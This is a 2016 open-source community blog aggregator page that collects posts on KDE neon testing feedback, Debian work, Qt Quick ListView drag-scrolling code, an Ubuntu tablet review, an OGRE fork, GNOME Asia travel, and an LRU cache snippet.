May 03, 2016

hackergotchi for Ubuntu developers

Ubuntu developers

Svetlana Belkin: Ubuntu Membership Board Meet and Greet @ UOS

Sorry for the short notice, but I’m happy to announce that the Ubuntu Membership Board will be hosting a “meet and greet” session at the UOS this week.  We encourage these who seek out getting their membership to come with questions and drafts of your Ubuntu Wiki page .  At least two of the board members will be there and ready to help.  The session is on Thursday at 16:00 – 16:55 UTC .

See you there!

EDIT TO ADD:  It’s a text-based only session.

03 May, 2016 01:51PM

Jonathan Riddell: KDE neon User Edition Testing Survey Results

We made a tech preview release of KDE neon User Edition 10 days ago and I made up a survey to get results for how people’s experiences were.  We got 59 responses, here’s a summary:

Location?

Most people from Europe, a number from the US, the rest spread around the usual parts of the world.

How did you make the installable drive/disk?

First past the post is people who used a Virtual Machine, sensible enough for a testing release.

Next is ROSA which I discovered recently and seems to work on most OSes.  Then people who use dd and risk wiping out their hard disk with a 1 letter typo.  Surprisingly there are still people who write to a DVD to install, I’ve no idea why.

In the other category is:
rufus (Windows only)
usb-image-creator (Ubuntu only)
suse imagewriter (unmaintained)
gnome multiwriter (Linux only and why would you want to write multiple at once?)
using: sudo cp neon-useredition-20160426-1028-amd64.iso /dev/sdb + sync (err, does this even work?)

Problems which occurred during booting of the live system

no problems for most

several people reported the black bar in the isolinux/syslinux theme.  these themes are spooky voodoo.

people commented on UEFI not being supported, UEFI is even more spooky voodoo and secureboot is evil voodoo.

“The GRUB splash is practically blank. Pressing the arrow keys opened a dropdown list for language selection. Then I pressed the Esc key to get to the GRUB splash. The “Install” option isn’t any different from the “Try without installing” option.”

“Select the language Spanish, and half the options were translated.”

Problems which occurred running the live system

Lots of “none” here too.  Mostly querying the lack of applications, that’s a feature for now, we’ll add apps soon.

“klipper in menu? Im-config in menu? Panel icons wrong size/blurry”

“Upon mouse click in kicker panel consistently resulted in black screen with no recovery. Possible issue with Plasma 6 and AMD GPUs.”

“Baloo crashed immediately (notification in system tray), but did not seem to affect system function.”

Problems which occurred running the installer

‘The “Continue” button is available even after all the steps.’

“You do not ship with open-vm-tools-desktop, so my virtual desktop was smaller than the Ubiquity window”

“the installer was unable to install some packages: (although the provided list was blank), so i couldn’t install the system”

“Does not recognize UEFI partitions/System. Only legacy boot possible.”

“1. On the second page of the installer is a non replaced variable: “$(RELEASE)” 2. While installing there is no teaser how awesome kde is :-), just a blank page.”

‘Text “$(RELASE)” is displayed in german version of “Download updates while installing neon” * Checkbox “Download updates while installing neon” cannot be checked’

“Can’t continue installation in second step (prepare) due continue button is non-functional. Improvement: Install-Program should be in favorites”

There’s bugs in here that come from Ubuntu and bugs that come from not having various bits installed.  I don’t think there’s much point spending much time on this as I expect to change to Calamares soon.

Problems which occurred on the installed system:

Quite a few without problems

Lots complain about missing icons, this is a cache issue “On the kicker menu, there were no icons, but they appeared after a re-boot.” we’ve fixed this, I hope.

“Can not start system, just weird colors after install. ”

“After install of guest additions on VirtualBox desktop panel would load but then disappear.”

“Wanted to install it on dualboot with win 10. Grub does not appear so I cannot boot kde neon which I prefere as primary OS.”

“got a grub shell after install”

“Text garbage on the light blue loading screen after the GRUB menu.”

“if a display goes to sleep plasma partly crashes (same happens on kubuntu) it’s a qt problem as far as i know”

“Illegible characters till NVIDIA driver loaded ”

“Unable to use software-properties-kde : Error: could not find a distribution template for neon/xenial” (known bug this one)

“System boots to console login prompt. X can be started after login. ”

Problems which occurred when installing new software

“Plasma Discover crashed” I have this too and it’s a priority to look into

“There was a problem installing kde-l10n because of conflict with plasma-desktop-data”
Problems which occurred when updating the system to latest packages:

No problems for most people but some issues:

  • The updater applet didn’t seem to work for some reason. Had to use Discover.
  • * First boot after “apt-get update” and “upgrade”: the system boots to graphical login screen, but after login only the “x” pointer ist visible. –> Hard reset
  • * After reboot only console login is visbile, X does not start “Timeout locking .Xauthority”
  • Could not find repos
  • ANOTHER – using Discover, added Gwenview – it installed but closed Discover on completion?

Thanks a lot to everyone who tested and gave feedback.  That gives me a good idea of the priority areas to work on.  Keep on testing and reporting bugs and of course any help welcome :)

 

facebooktwittergoogle_pluslinkedinby feather

03 May, 2016 11:27AM

Raphaël Hertzog: My Free Software Activities in April 2016

My monthly report covers a large part of what I have been doing in the free software world. I write it for my donators (thanks to them!) but also for the wider Debian community because it can give ideas to newcomers and it’s one of the best ways to find volunteers to work with me on projects that matter to me.

Debian LTS

I handled a new LTS sponsor that wanted to see wheezy keep supporting armel and armhf. This was not part of our initial plans (set during last Debconf) and I thus mailed all teams that were impacted if we were to collectively decide that it was OK to support those architectures. While I was hoping to get a clear answer rather quickly, it turns out that we never managed to get an answer to the question from all parties. Instead the discussion drifted on the more general topic of how we handle sponsorship/funding in the LTS project.

Fortunately, the buildd maintainers said they were OK with this and the ftpmasters had no objections, and they both implicitly enacted the decision: Ansgar Burchardt kept the armel/armhf architectures in the wheezy/updates suite when he handled the switch to the LTS team, and Aurélien Jarno also configured wanna-build to keep building armel/armhf for the suite. The DSA team did not confirm that this change was not interfering with one of their plans to decommission some hardware. Build daemons are a shared resource anyway and a single server is likely to handle builds for multiple releases.

DebConf 16

This month I registered for DebConf 16 and submitted multiple talk/BoF proposals:

  • Kali Linux’s Experience of a Debian Derivative Based on Testing (Talk)
  • 2 Years of Work of Paid Contributors in the Debian LTS Project (Talk)
  • Using Debian Money to Fund Debian Projects (BoF)

I want to share the setup we use in Kali as it can be useful for other derivatives and also for Debian itself to help smooth the relationship with derivatives.

I also want to open again the debate on the usage of money within Debian. It’s a hard topic but we should really strive to take some official position on what’s possible and what’s not possible. With Debian LTS and its sponsorship we have seen that we can use money to some extent without hurting the Debian project as a whole. Can this be transposed to other teams or projects? What are the limits? Can we define a framework and clear rules? I expect the discussion to be very interesting in the BoF. Mehdi Dogguy has agreed to handle this BoF with me.

Packaging

Django. I uploaded 1.8.12 to jessie-backports and 1.9.5 to unstable. I filed two upstream bugs (26473 and 26474) for two problems spotted by lintian.

Unfortunately, when I wanted to upload it to unstable, the test suite did not ran. I pinned this down to a sqlite regression. Chris Lamb filed #820225 and I contacted the SQLite and Django upstream developers by email to point them to this issue. I helped the SQLite upstream author (Richard Hipp) to reproduce the issue and he was quick to provide a patch which landed in 3.12.1.

Later in the month I made another upload to fix an upgrade bug (#821789).

GNOME 3.20. As for each new version, I updated gnome-shell-timer to ensure it works with the new GNOME. This time I spent a bit more time to fix a regression (805347) that dates back to a while and that would never be fixed otherwise since the upstream author orphaned this extension (as he no longer uses GNOME).

I have also been bitten by display problems where accented characters would be displayed below the character that follows. With the help of members of the GNOME team, we found out that this was a problem specific to the cantarell font and was only triggered with Harfbuzz 1.2. This is tracked in Debian with #822682 on harfbuzz and #822762 in fonts-cantarell. There’s a new upstream release (with the fix) ready to be packaged but unfortunately it is blocked by the lack of a recent fontforge in Debian. I thus mailed debian-mentors in the hope to find volunteers to help the pkg-fonts team to package a newer version…

Misc Debian/Kali work

Distro Tracker. I started to mentor Vladimir Likic who contacted me because he wants to contribute to Distro Tracker. I helped him to setup his development environment and we fixed a few issues in the process.

Bug reports. I filed many bug reports, most of them due to my work on Kali:

  • #820288: a request to keep the wordpress package installable in older releases (due to renaming of many php packages)
  • #820660: request support of by-hash indices in reprepro
  • #820867: possibility to apply overrides on already installed packages in reprepro
  • #821070: jessie to stretch upgrade problem with samba-vfs-modules
  • #822157: python-future hides and breaks python-configparser
  • #822669: dh_installinit inserts useless autoscript for System V init script when package doesn’t contain any
  • #822670: dh-systemd should be merged into debhelper, we have systemd by default and debhelper should have proper support for it by default

I also investigated #819958 that was affecting testing since it has been reported to Kali as well. And I made an NMU of dh-make-golang to fix #819472 that I reported earlier.

Thanks

See you next month for a new summary of my activities.

No comment | Liked this article? Click here. | My blog is Flattr-enabled.

03 May, 2016 07:13AM

The Fridge: Ubuntu Weekly Newsletter Issue 464

Welcome to the Ubuntu Weekly Newsletter. This is issue #464 for the week April 25 – May 1, 2016, and the full version is available here.

In this issue we cover:

The issue of The Ubuntu Weekly Newsletter is brought to you by:

  • Elizabeth K. Joseph
  • Simon Quigley
  • Chris Guiver
  • Chris Sirrs
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution 3.0 License BY SA Creative Commons License

03 May, 2016 01:39AM

May 02, 2016

hackergotchi for Maemo developers

Maemo developers

Visitor for Klartext

Felt good about explaining my work last time. For no reason. I guess I’m happy, or I no longer feel PGO’s pressure or something. Having to be politically correct all the times, sucks. Making technically and architecturally good solutions is what drives me.

Today I explained the visitor pattern. We want to parse Klartext in such a way that we can present its structure in a editing component. It’s the same component for which I utilized a LRU last week. We want to visualize significant lines like tool changes, but also make cycles foldable like SciTe does with source code and a whole lot of other stuff that I can’t tell you because of teh secretz. Meanwile these files are, especially when generated using cad-cam software, amazingly huge.

Today I had some success with explaining visitor using the Louvre as that what is “visitable” (the AST) and a Japanese guy who wants to collect state (photos) as a visitor of fine arts. Hoping my good-taste solutions (not my words, it’s how Matthias Hasselmann describes my work at Nokia) will once again yield a certain amount of success.

ps. I made sure that all the politically correcting categories are added to this post. So if you’d have filtered away the condescending and controversial posts from my blog, you could have protected yourself from being in total shock now (because I used the sexually tinted word “sucks”, earlier). Guess you didn’t. Those categories have been in place on my blog’s infrastructure since many years. They are like the Körperwelten (Bodyworlds) exhibitions; you don’t have to visit them.

0 Add to favourites0 Bury

02 May, 2016 08:06PM by Philip Van Hoof (pvanhoof@gnome.org)

hackergotchi for Ubuntu developers

Ubuntu developers

Aurélien Gâteau: Reordering a Qt Quick ListView via drag'n'drop - part 2

Welcome to this second article in the "Reordering a Qt Quick ListView via drag'n'drop" series. If you haven't read it already, I suggest you start with the first article.

In this article we are going to add a handy feature to our ListView: the ability to automatically scroll the ListView when dragging an item to its top or bottom edge. This is nice when you want to drag an item to a place which is not currently visible.

Here is this new behavior in action:

Drag scrolling

We are going to implement this by using the MouseArea of the DraggableItem introduced in the first article. When the mouse cursor in this MouseArea is close enough to the borders of the ListView we will trigger scrolling animations. This is a bit less elegant than adding MouseAreas at the top and bottom of the ListView, but has the nice advantage of not requiring any change in the ListView.

The first thing we are going to do is add a few properties to our component:

// Size of the area at the top and bottom of the list where drag-scrolling happens
property int scrollEdgeSize: 6

// Internal: set to -1 when drag-scrolling up and 1 when drag-scrolling down
property int _scrollingDirection: 0

// Internal: shortcut to access the attached ListView from everywhere.
// Shorter than root.ListView.view
property ListView _listView: ListView.view

Now we can declare two animations to scroll the list:

SmoothedAnimation {
    id: upAnimation
    target: _listView
    property: "contentY"
    to: 0
    running: _scrollingDirection == -1
}

SmoothedAnimation {
    id: downAnimation
    target: _listView
    property: "contentY"
    to: _listView.contentHeight - _listView.height
    running: _scrollingDirection == 1
}

These two animations operate on the ListView and will make it scroll by animating its contentY property, depending on the value of _scrollingDirection. All that remain is to update _scrollingDirection when dragging to the top or bottom edge of the ListView. We do this by changing the binding of scrollingDirection when we enter the "dragging" state:

_scrollingDirection: {
    var yCoord = _listView.mapFromItem(dragArea, 0, dragArea.mouseY).y;
    if (yCoord < scrollEdgeSize) {
        -1;
    } else if (yCoord > _listView.height - scrollEdgeSize) {
        1;
    } else {
        0;
    }
}

Here we define a complex expression for scrollingDirection: first we compute the y coordinate relative to the ListView. Then we check its value to see if we are on either the top or bottom edge, and update the value accordingly.

We can now scroll the ListView by dragging items to its top or bottom edge. You might notice an annoying bug though: when you drop an item below the last item the dropped item does not become visible. To workaround this, we need a little hack: once the ListView has moved the dropped item at its final position, we can call the ListView.positionViewAtIndex() method to ensure our item is visible. The trick is, even if the code connected to the moveItemRequested moves the Item synchronously, we cannot call positionViewAtIndex right after the signal has been emitted: we need to wait until the ListView has actually adjusted itself after the move. To do so, we can use a Timer object to delay the call to positionViewAtIndex. This is what emitMoveItemRequested now looks like:

function emitMoveItemRequested() {
    var dropArea = contentItemWrapper.Drag.target;
    if (!dropArea) {
        return;
    }
    var dropIndex = dropArea.dropIndex;
    if (model.index < dropIndex) {
        dropIndex--;
    }
    if (model.index === dropIndex) {
        return;
    }
    root.moveItemRequested(model.index, dropIndex);
    makeDroppedItemVisibleTimer.start();
}

And this is our Timer:

Timer {
    id: makeDroppedItemVisibleTimer
    interval: 0
    onTriggered: {
        _listView.positionViewAtIndex(model.index, ListView.Contain);
    }
}

An interval of 0 means the timer will be triggered as soon as we are back to the event loop. Note that this only works because in our example the code connected to the DraggableItem.moveItemRequested signal is synchronous: it does not delay the move of the dropped item. If the code were asynchronous, you would have to find a way to call ListView.positionViewAtIndex after the move is done, which most likely would require calling it outside of DraggableItem.

We are done with drag-scrolling, the user can now scroll long lists to find the place to drop the dragged item. The source code for this article is available in the associated GitHub repository, under the "2-drag-scroll" tag.

02 May, 2016 05:52PM

Costales: Review tablet bq M10 Ubuntu Edition

Mi primer post desde una tablet con Ubuntu, la bq M10.

M10
Podría hablar de su hardware o de sus especificaciones, podría decir su precio, podría contar cuantas versiones hay de la tablet, podría especificar la versión de cada aplicación, podría contar qué es la convergencia...
Pero toda esa información está disponible en Internet desde que salió al mercado. Por lo que mejor os cuento la experiencia de usar una tablet con Ubuntu durante un par de semanas ;)

¿Mi escritorio? No ;)
Primer punto que quiero aclarar: no me gustan las tablets. Prefiero mil veces la precisión del teclado y ratón.

Segundo punto: adoro Ubuntu Phone. Cuando estoy AFK sigo disponiendo de un autentico Ubuntu en mi bolsillo.

Tercer punto: No tengo monitores con entrada HDMI, por lo que la convergencia que puedo esperar es la basada en la futura Miracast.



Centrémonos en la tablet del mercado que mas se asemeja a un SO real de escritorio.

El sistema operativo es Ubuntu, pero Ubuntu Touch con Unity 8, no el Unity 7 del escritorio actual.

¡Legendario! :)
Dicho esto, las aplicaciones son las mismas que las del móvil, pero sorpresa, están preinstaladas unas cuantas como LibreOffice, GIMP, Gedit, Firefox, XChat...
Lo mejor es que son aplicaciones reales que con teclado y ratón se comportan como tal. Lo malo es que no es fácil instalar otras aplicaciones de escritorio (llamadas legacy). Tengo entendido que a corto plazo, se podrá, y entonces la tablet ganara muchos enteros.

Mientras tanto, yo no uso LibreOffice, GIMP esporádicamente, Gedit nunca y al final lo que tengo es un móvil de 10", es decir, poco útil y productivo para mi uso diario.

Pero lo que para mi es malo, para otros es la perfección. Conozco profesores y alumnos para los que esta tablet es perfecta: Con su 1/2kg de peso es muy portable, su tarea principal es usar LibreOffice y les permite trabajar con el mismo dispositivo en casa, en la escuela e incluso proyectar presentaciones. Sin duda, ante esas necesidades, sólo esta tablet o un ultrabook carísimo cubriría esa casuística.
El potencial nicho de mercado es muy grande.

La tablet que estoy probando es la FHD, al igual que los móviles con Ubuntu de mucha resolución de pantalla tiene un pequeño lag incómodo.

Choosing app

bq M10 se maneja igual que un bq E4.5 Ubuntu Edition en todos los sentidos. Si conectamos un ratón por Bluetooth se transforma en modo ventana, con Unity mostrándose al acercar el ratón. Podemos minimizar, maximizar, mover, anclar ventanas... realmente aparenta un Ubuntu de escritorio y es aquí donde Ubuntu Touch gana enteros.

keyboard + mouse = PC

Respecto a la convergencia, como comenté, yo no dispongo de monitores HDMI. Si tú sí tienes, puedes trabajar de varios modos:

  • Táctil como cualquier otra tablet.
  • Añadirle teclado y ratón y tener un pequeño netbook.
  • Añadirle teclado y ratón y conectarla por HDMI a un monitor y tener un PC, siendo la tablet la CPU.
Convergencia :))

    La batería dura unas ~8 horas trabajando.

    En modo ventana (con ratón conectado) todas las aplicaciones corren a la vez con multitarea real. En modo touch, sólo está en ejecución la que está en primer plano.

    ¿¿Netbook??

    Es una pasada usarla con el teclado, podemos copiar, pegar (incluso entre aplicaciones), cambiar de aplicación con Alt+Tab, Win+número para seleccionar aplicación en Unity... etc.

    Dispone de un navegador de ficheros con la apariencia de Nautilus.

    Y muy útil el dividir la pantalla viendo 2 aplicaciones simultáneamente en modo touch. Para ello arrastramos cualquier aplicación con 3 dedos.





    Puedes comprar esta tablet aquí. Imágenes CC.

    02 May, 2016 04:43PM by Marcos Costales (noreply@blogger.com)

    Daniel Holbach: Ubuntu Core at UOS 16.05

    Ubuntu 16.04 LTS is out of the door, we started work on the Yakkety Yak already, now it’s time for the Ubuntu Online Summit. It’s all happening 3-5 May 14-20 UTC. This is where we discuss upcoming features, get feedback and demo all the good work which happened recently.

    If you want to join the event, just head to the registration page and check out the UOS 16.05 schedule afterwards. You can star (☆) sessions and mark them as important to you and thus plan your attendance for the event.

    Now let’s take a look on the bits which are in one way or another related to Ubuntu Core at UOS:

    • Snappy Ubuntu 16 – what’s new
      16.04 has landed and with it came big changes in the world of snapd and friends. Some of them are still in the process of landing, so you’re in for more goodness coming down the pipe for Ubuntu 16.04 LTS.
    • The Snapcraft roadmap
      Publishing software through snaps is super easy and snapcraft is the tool to use for this. Let’s take a look at the roadmap together and see which exciting features are going to come up next.
    • Snappy interfaces
      Interfaces in Ubuntu Core allow snaps to communicate or share resources, so it’s important we figure out how interfaces work, which ones we’d like to implement next and which open questions there are.
    • Playpen – Snapping software together
      Some weeks ago the Community team set up a small branch in which we collaborated on snapping software. It was good fun, we worked on things together, learnt from each other and quickly worked out common issues. We’d like to extend the project and get more people involved. Let’s discuss the project and workflow together.
    • How to snap your software
      If you wanted to start snapping software (yours or somebody else’s) and wanted to see a presentation of snapcraft and a few demos, this is exactly the session you’ve been looking for.
    • Snappy docs – next steps
      Snappy and snapcraft docs are luckily being written by the developers as part of the development process, but we should take a look at the docs together again and see what we’re missing, no matter if it’s updates, more coherence, more examples or whatever else.
    • Demo: Snaps on the desktop
      Here’s the demo on how to get yourself set up as a user or developer of snaps on your regular Ubuntu desktop.

    I’m looking forward to see you in all these sessions!

    02 May, 2016 03:43PM

    hackergotchi for Maemo developers

    Maemo developers

    Introducing the OGRE fork on GitHub

    in this post I want to introduce the OGRE fork on github. The goal of the fork is to provide a stable and reliable OGRE 1.x series while at the same time modernizing parts under the hood updates.

    The idea behind this is that there are many existing 1.x codebases, actually a whole 1.x ecosystem, that can be modernized that way.
    The last release of the 1.x series was over 2 years ago, so using the current 1.10 branch already gives a lot of improvements.

    However the 1.10 branch contains some unnecessary changes that make it incompatible to the 1.9 release. These were reverted, so old code should compile again.

    Additionally there are modernizing changes when compared with the upstream at bitbucket, which are discussed in more detail in the following.

    Replace legacy renderers

    With 1.9 the only stable renderers were GL(2.0) and DX9 which by today are outdated and produce different results than the GLES2 renderer that is used for Web and Mobile, which makes porting applications harder.

    Therefore the goal is to get the GL3Plus renderer into a shape where it can act as a drop-in replacement for the old GL render and then drop the latter.

    You can see the current status here – while it says that only 41/86 tests pass, most of the failed tests actually only differ in only 1 or 2 pixels which is pretty good when considering we are comparing fixed function vs. dynamically generated shaders (RTSS).

    But the fork does not stop here; the GL renderers now also share the context creation code. This allows using the GLES2 renderer on the desktop or creating a GL3+ context using EGL – which is a prerequisite for headless rendering and for running on Wayland/MIR. Overall this makes your applications much more portable.

    Improved regression testing

    Changing the renderer requires being able to continuously monitor whether the rendering is still correct and to immediately detect regressions.

    For this the Testing and VisualTesting frameworks were fixed and now correctly run on Linux and OSX. They run on each pull request to catch errors before the code even touches master.

    Furthermore the tests can now be built without input handling (OIS) which hopefully will lead to wider adoption.

    The unit tests still use cppunit which is a pain to use when compared to gtest, but changing that would require a large rewrite.

    Batteries Included

    The build of the fork automatically handles the dependencies by downloading and building them as needed. On all platforms. So you do not have to care about mismatching compile settings any more.

    Furthermore the SampleBrowser can now be build without input handling which eases quick testing. And in case you want input, now SDL2 is used instead of the esoteric and outdated OIS.

    Next bringing your applications to the web is now easier; OGRE was able to run in the browser for a long time already – but the process was only badly documented. The fork tracks the Emscripten sample code inside the repository and also has documentation on how to use it.

    I gave only a high level overview of the changes above. If you need more details, head over here.

    A word on OGRE 2.1

    You might wonder why one should care about the 1.x and not go for 2.1 directly. The obvious reason is that you have an existing codebase and OGRE 2.1 drastically changes API and even the material file format.

    Then, while faster than 1.x, OGRE 2.x is still far from feature completeness with 1.x – it still completely lacks Web and Mobile support.
    Faster also actually depends on your scene/ material usage; For instance, if you only render a single object (product showcase) 2.x will not offer you any advantages.

    Finally the main functionality advance in 2.1, namely the new material system (HLMS) and with it physically based shading were backported to 1.x.

    Yet if you only care about desktop and want to render large immersive worlds (lots of nodes, lots of materials), 2.1 is the way to go.

     

     

    0 Add to favourites0 Bury

    02 May, 2016 02:38PM by Pavel Rojtberg (pavel@rojtberg.net)

    hackergotchi for Blankon developers

    Blankon developers

    Syai Mif: Journey to West (English version)

    The first trip to the west and second chance as speakers in the GNOME Asia Summit Call for Papers first before traveling to the west or the opportunity to attend the event classmates GNOME Asia Summit as speakers i first do apply my presentation enrolment as speakers. I fill the overall formnya until and after … Lanjutkan membaca Journey to West (English version)

    02 May, 2016 03:09AM

    Syai Mif: Journey to West (Indonesia version)

    Perjalanan pertama ke barat dan kesempatan kedua sebagai dalam GNOME Asia Summit Call for papers Pertama sebelum melakukan perjalanan ke barat atau kesempatan untuk menghadiri acara sekelas GNOME Asia Summit sebagai pembicara, saya pertama kali melakukan apply presentasi saya saat pendaftaran sebagai pembicara. Saya isi formnya secara keseluruhan sampai dan setelah saya apply saya mendapatkan konfirmasi … Lanjutkan membaca Journey to West (Indonesia version)

    02 May, 2016 02:11AM

    May 01, 2016

    hackergotchi for Ubuntu developers

    Ubuntu developers

    Svetlana Belkin: Goals for Y Cycle

    It’s that time again when I write up goals for the next Ubuntu release cycle!  But as a side thought, I noticed that I started to think in Ubuntu release cycles when planning my goals for the next six months.  I guess it’s my new measure of time since I’m out of school…  Anyhow, these are my goals for the Y (16.10) cycle:

    • See the Tweets below:

    I don’t know yet if I will remix Red Notebook because at the moment, it’s the closest thing that I see to a electronic lab notebook. I will have post when I start this project (Week of May 1st to Week of May 8th)

    EDIT TO ADD: I’m also thinking of writing one in Qt and calling it Qt ELN (Electronic Lab Notebook).

    • Hack around my favorite, net hack game, Stone Soup’s Dungeon Crawl! My main idea/hack is to add zealots of every god instead of just a select few.  But I may expend on that…  Again, I will have a post when I start this project.
    • Do more with Linux Padawan’s community.  I don’t know what yet though…

    Hopefully, I can complete these projects or at least learn from working on them.  I will work on updating you all at least once a month.

    Wish me luck!

    01 May, 2016 05:01PM

    Full Circle Magazine

    Just a quick look at GIMP on the BQ Aquaris M10 Ubuntu Edition tablet.

    01 May, 2016 03:32PM

    Michael Terry: In-App Purchases Available in the Ubuntu Store

    I haven’t seen anyone else trumpeting this online. So I guess I will. 🙂

    Since Ubuntu Touch’s OTA 10 update, apps can offer in-app purchases! Yay!

    Besides allowing someone to write the next Candy Crush, this also means that app authors can stop providing separate “donation” versions of their app. Which means less busywork for authors, reviews are all on the same app, and less confusion for users.

    Documentation is available from the QtPurchasing module docs. And remember to update your app’s framework to 15.04.4 (OTA 10).

    If you want to see it in action, I’ve enabled a donation button in my “Lone Wolf” game app. No need to actually donate, it just might be interesting to see how it looks to the user (hit the “night mode” button in the upper right to see it — donating turns on the night mode feature).

    Speaking of which, if you actually do something based on a purchase (like enabling a feature), the QtPurchasing docs recommend saving purchase information in “persistent storage.” I’ve just stuffed a boolean in a Settings object. But that’s easy for a user to modify themselves on disk. I don’t care about donation fraud, but I’m curious how I should better protect against that, in case I do something more interesting with IAP.

    01 May, 2016 02:07PM

    hackergotchi for Blankon developers

    Blankon developers

    Ahmad Haris: Journey to The West (GNOME Asia Summit 2016) – Delhi, India

    This is third time GNOME Asia Summit that I attended. My contribution in this summit as Asia Committee. I help everything that I can, such as:

    1. getting sponsor
    2. designing web (Asep, Piko and Kukuh also help on this)
    3.  designing posters (Kukuh and Aris also help on this)
    4. coordinating with other Asia Committee, GNOME Board and Local Committee
    5. hand carry FANS Shoes (sponsor) from Jakarta to Delhi

    I was excited actually when this year summit happen in India, it’s because Indonesia has similar culture with India and it’s common that Indonesia people watch Bollywood movie (my father still love Bollywood movie, but me, only Shakhrukh Khan and some others).

    Personally, I also dreamed to visiting few historical place. I’ve been on Great Wall of China when attended GNOME Asia Summit 2016 in Beijing. And this year, we have Taj Mahal.

    Submit Talk

    I submitted talk and approved about Contributing to GNOME In Indonesia. But I kick out my self (because I’m one of person who choose which one topic is better for conference). I would like to see locals talk than my self.

    Ticket and Visa

    I bought AirAsia ticket (because it’s cheaper than others) arround 400 USD from Jakarta – New Delhi and New Delhi – Jakarta. I got travel subsidy from GNOME (thanks to GNOME). For Visa, I use e-Visa. It’s easy and fast. It’s cost about 49 USD.

    Arrived at India

    I arrived at India about 10 pm local time. It’s take near an hour to pass immigration. And magically, easy to pass custom (fyi, I bring 30 shoes and 21 tshirt). I’m with Moko and Syaimif at that time.

    Getting taxi and go straight to Manav Rachna University. The taxi driver very friendly. He tried to speak with us even his English not good enough. Arrived at university about 1 am and have difficulties because security of university can’t speak English. Luckily, our taxi driver help us. So we can get our room that local committee provide and have rest.

    Anyway, I will not talk about technically thing here.

    Day 0

    I getting late to the venue just because I don’t know where the venue. The University is huge enough, lot of building and wide area. They already starting opening speak at that time. My first impression is, I’m happy because I meet lot of friends.

    The good thing in here are people love to talk with foreigner, maybe because mostly they speak English in daily life. I enjoy talk with all people, because it makes my English better and better.

    I was amazed with participants. Many participants love technically things. Especially when GStreamer workshop, many people follow it. This not happen in Indonesia last year.

    https://www.flickr.com/photos/kitty-kat/26296528570/in/pool-gnomeasia2016/

    Day 1st

    I was little bit shocked actually, just because me and Bin Li must have opening speech with Locals such as some Professor/Dean. Not preparing about that. But the opening is also great, that’s new experience for me.

    DSC00643

    Day 1 was amazing because it’s feel reunion and meet new friend. But for me, I can talk with another GNOME Board Director, Cosimo Cechi.

    In this summit, we also has local foods and local tea, very delicious. And the foods it’s self was great and not weird for me since me as personal, little bit difficult for getting food in another country.

    DSC00699

    The good news from Day 1st, there are lot of female participant. It’s good because mostly, IT Summit has less female participant. They also active.

    DSC00820

    Day 2nd

    Second day summit also interesting, personally I’m attend to Bugzilla Class with Andre Klapper as speaker. I missed this class last year in GNOME Asia 2015.

    DSC00730

    And I was also on Mr. Iwan’s Class, talking about FOSS in Tata Logam Lestari.

    DSC00739

    But I’m lost at Moko’s Class. Day 2nd make me busy. Me, Kat, Cosimo and Bin Li being famous here. We invited to visiting lot of university department. And has honor to meet Director of the Manav Rachna University. Me, Kat and Cosimo also has On Air at Radio that belong to Manav Rachna University and aired on Faridabad area. That’s my first time on foreign radio. Hahaha.

    Last Day, One Tour Day

    Last day was journey. I can’t explain in text, but this was amazing trip. I really enjoy this since this is my first time in India. We go to Agra (Taj Mahal).

    BIN_6248s

    IMG_20160424_162250

    You can see, all of us are enjoy this trip event I feel too much wefie. Hahaha.

    Extra Day

    Monday night is my flight, so I still have few hours to take look around New Delhi. I’m going with Moko, Syaimif, Bin Li, Michael, Jonathan, Eric, Johan Chi and Raju, also Amisha, but she left at afternoon for family business.

    Our target is Delhi Gate.

    DSC01037

    After all, we can contribute many things to GNOME. Just which one that you interested.

    Note : you can see all group picture at https://www.flickr.com/groups/gnomeasia2016/pool/

    Disponsori oleh Gnome Foundation

    Disponsori oleh GNOME Foundation

     

     

     


    01 May, 2016 04:25AM

    hackergotchi for Ubuntu developers

    Ubuntu developers

    Ubuntu GNOME: Say hello to Yakkety Yak

    Hello world,

    Oh yes, here we are again with yet another new cycle and this time, it’s the “YY” cycle – Yakkety Yak – please see the official announcement.

    We would like to announce that testing Ubuntu GNOME Yakkety Yak (16.10) is open and we encourage those who would like to have fun to actually start testing even though we have just started and nothing new yet but you never know when you could find a new bug?!

    Whether you are new to testing or not, here is your reference:

    https://wiki.ubuntu.com/UbuntuGNOME/Testing

    And as always, if you need any help or have any question, please contact us!

    Thank you 🙂

     

    01 May, 2016 01:39AM

    April 30, 2016

    hackergotchi for Grml developers

    Grml developers

    Frank Terbeck: Chez Scheme is now Open Source

    The previously commercial Scheme implementation (for more than 30 years) known as Chez Scheme from Cadence Research Systems (which was aquired by Cisco in 2012) was released as Open Source software using the Apache Licence 2.0.

    This is a pretty cool move by R. Kent Dybvig and Cisco making this high quality implementation available to the general public. Chez has, among other things, support for compiling Scheme sources to native machine code. Something that my go-to Scheme GNU Guile doesn't feature (although there are long term plans into that direction, as far as I know).

    In case you're interested:

    30 April, 2016 11:17PM

    hackergotchi for Xanadu developers

    Xanadu developers

    Firefox integra GTK3 en Linux y mejora la seguridad del compilador de JavaScript (JIT)

    Hace pocas horas Mozilla ha liberado una nueva versión de Firefox en la que destacan la integración con GTK3 en Linux, mejoras en las seguridad del compilador JS en tiempo real, cambios en WebRTC y nuevas funcionalidades para Android e … Sigue leyendo

    30 April, 2016 07:16PM by sinfallas

    hackergotchi for Xanadu

    Xanadu

    Xanadu GNU/Linux en la redes sociales

    Hace unos días publicamos una lista de enlaces relacionados con el desarrollo y la documentación de Xanadu GNU/Linux, pero como no todo es trabajo hoy les traemos una lista de las redes sociales en la que nuestra comunidad tiene presencia. … Sigue leyendo

    30 April, 2016 07:01PM by sinfallas

    April 29, 2016

    hackergotchi for Maemo developers

    Maemo developers

    Putting an LRU in your code

    For the ones who didn’t find the LRU in Tracker’s code (and for the ones who where lazy).

    Let’s say we will have instances of something called a Statement. Each of those instances is relatively big. But we can recreate them relatively cheap. We will have a huge amount of them. But at any time we only need a handful of them.

    The ones that are most recently used are most likely to be needed again soon.

    First you make a structure that will hold some administration of the LRU:

    typedef struct {
    	Statement *head;
    	Statement *tail;
    	unsigned int size;
    	unsigned int max;
    } StatementLru;

    Then we make the user of a Statement (a view or a model). I’ll be using a Map here. You can in Qt for example use QMap for this. Usually I want relatively fast access based on a key. You could also each time loop the stmt_lru to find the instance you want in useStatement based on something in Statement itself. That would rid yourself of the overhead of a map.

    class StatementUser
    {
    	StatementUser();
    	~StatementUser();
    	void useStatement(KeyType key);
    private:
    	StatementLru stmt_lru;
